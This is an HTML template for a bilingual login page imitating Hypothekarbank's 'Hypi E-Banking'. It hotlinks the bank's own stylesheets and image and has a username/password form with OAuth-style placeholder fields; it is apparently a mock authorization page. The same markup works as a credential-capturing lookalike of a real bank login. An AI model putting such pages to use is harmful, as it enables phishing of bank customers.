<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">


  <link href="https://ebanking.hbl.ch/secureLogin/Content/stylestyle" rel="stylesheet"/>

  <link href="https://ebanking.hbl.ch/secureLogin/Content/template?v=IfHWs-sg56pxZwy0EW4-mKUro_9jHZby7w2Krkzsk7M1" rel="stylesheet"/>
  <title>Hypothekarbank</title>
  <style>
    body {
/*            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;*/
/*            background-color: #f4f4f4;*/
}

header {
  background-color: #007bc0;
  color: #fff;
  text-align: center;
  padding: 1em;
  display: flex;
  flex-direction: row;
  justify-content: center;
  gap: 5em;
}

section {
  max-width: 600px;
  margin: 2em auto;
  background-color: #fff;
  border-radius: 8px;
}
section img {
  grid-area: a;
}

section form {
  padding: 2em;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);

}

label {
  display: block;
  margin-bottom: 0.5em;
  font-weight: bold;
}

input {
  width: 100%;
  padding: 0.5em;
  margin-bottom: 1em;
  border: 1px solid #ccc;
  border-radius: 4px;
}

button {
  background-color: #007bc0;
  color: #fff;
  padding: 0.5em 1em;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

button:hover {
  background-color: #007bc0;
}
</style>
</head>
<body>
  <header>

    <h1 class="text-1">
      Bienvenue dans votre                  <br>
      <strong class="no-wrap">Hypi E-Banking</strong>
    </h1>
    <h1 class="text-1">
      Willkommen im                    <br>
      <strong class="no-wrap">Hypi E-Banking</strong>
    </h1>
  </header>
  <section>
    <!-- Intégration de l'image fournie depuis Unsplash -->
    <img src="https://ebanking.hbl.ch/secureLogin/Content/themes/hbl/background.jpg" alt="Personne travaillant sur un ordinateur avec un grand sourire" style="max-width: 100%; border-radius: 8px; margin-bottom: 1em;">

    <form action="" method="GET" >
      <label for="username">Nom d'utilisateur / Benutzername :</label>
      <input type="text" id="code" name="code" required>

      <label for="password">Mot de passe / Passwort :</label>
      <!-- <input type="password" id="password" name="password" required> -->
      <input type="password" id="password" name="password">
      <input type="hidden" name="state" value="{{state}}">
      <input type="hidden" name="logged_in_already" value="1">
      <input type="hidden" name="redirect_uri" value="{{redirect_uri}}">

      <button type="submit">Se connecter / Einloggen</button>
    </form>
  </section>
  <footer>
    <!-- <p>Hypothekarbank &copy; 2024</p> -->
  </footer>
</body>
</html>
